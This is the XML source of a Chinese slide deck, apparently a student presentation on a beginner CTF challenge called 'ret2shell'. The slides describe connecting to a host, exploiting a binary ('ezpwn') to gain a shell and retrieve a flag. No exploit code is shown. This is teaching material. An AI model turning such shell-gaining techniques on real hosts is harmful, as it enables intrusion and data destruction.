  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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8232C3-52A0-4616-8096-DC653489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AF7BB-267A-40D2-867D-FDA4910D6EA9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US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43011" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4D4A57-0EDB-40A2-8226-305706186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104" y="1120775"/>
            <a:ext cx="24994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3539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第二节  演示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749A628-F068-42B9-A12E-C1095108CBC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114801" y="1935388"/>
            <a:ext cx="581025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B8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noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1806846B-F1BE-4AAB-96F9-F7F01D8522E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045075" y="2008413"/>
            <a:ext cx="3454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3539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演示内容简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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4" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0132AE8-F04D-4F94-B667-65D5DD0F0E4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45074" y="2825638"/>
            <a:ext cx="40254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3539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操作过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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6" name="MH_SubTitle_1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCF0B57-78E7-4AA0-8A22-FA53C11477A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45074" y="3651475"/>
            <a:ext cx="3454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3539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演示结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03539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8BD11B60-5C47-41F1-AB7C-092F12F0733B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114801" y="2738663"/>
            <a:ext cx="581025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B8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noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204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二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63271FF8-AD02-4E47-97C0-7CE303A59348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114801" y="3564163"/>
            <a:ext cx="581025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B8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noProof="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204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3303268286"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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25F6FA-6813-47AC-9A9D-660601A6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3C339-E910-450F-8393-0E0EA8B279E4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US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41" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BF576A8-DF59-408A-BCCC-C830CF072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6" y="107951"/>
            <a:ext cx="46593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演示内容简介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EFF735-B896-2706-3359-8303CA5ADA24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395660" y="1234558"/>
            <a:ext cx="58203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新生赛关于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shellcode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一个题目，其目的是连接到对应主机，执行对应主机上一个可以利用的程序，获取主机的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shell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控制权。进而可以对相应主机内部的信息进行读取或破坏。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0C9ED2-66AB-EAB1-76CD-FBEEBE7185A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395660" y="2789834"/>
            <a:ext cx="60943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题目名称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret2shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供文件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ezpwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（二进制文件）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标：获取主机上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>环境搭建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2DEE47-E978-14C5-114A-05031E327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91" y="2836672"/>
            <a:ext cx="6979009" cy="3702240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CB898B64-8BCD-1B6E-A7DC-FE693B9A52B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556426" y="3710191"/>
            <a:ext cx="2818365" cy="186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61852"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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9"/>
  <p:tag name="MH_SECTIONID" val="593,594,595,596,597,598,599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3202"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_TYPE" val="SubTitle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74909"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_ORDER" val="文本框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3202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3202"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_TYPE" val="SubTitle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3202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3202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3202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3202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3202"/>
  <p:tag name="MH_LIBRARY" val="GRAPHIC"/>
  <p:tag name="MH_TYPE" val="Sub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3202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10524</TotalTime>
  <Words>737</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>78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-apple-system</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>PingFang SC</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>3_自定义设计方案</vt:lpstr>
      <vt:lpstr>自定义设计方案</vt:lpstr>
      <vt:lpstr>2_自定义设计方案</vt:lpstr>
      <vt:lpstr>4_自定义设计方案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weiwei</dc:creator>
  <cp:lastModifiedBy>贾 庆林</cp:lastModifiedBy>
  <cp:revision>541</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-17T03:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-23T02:56:10Z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E83796620E50492DBBA2D4CC2925C035</vt:lpwstr>
  </property>
</Properties>
</file>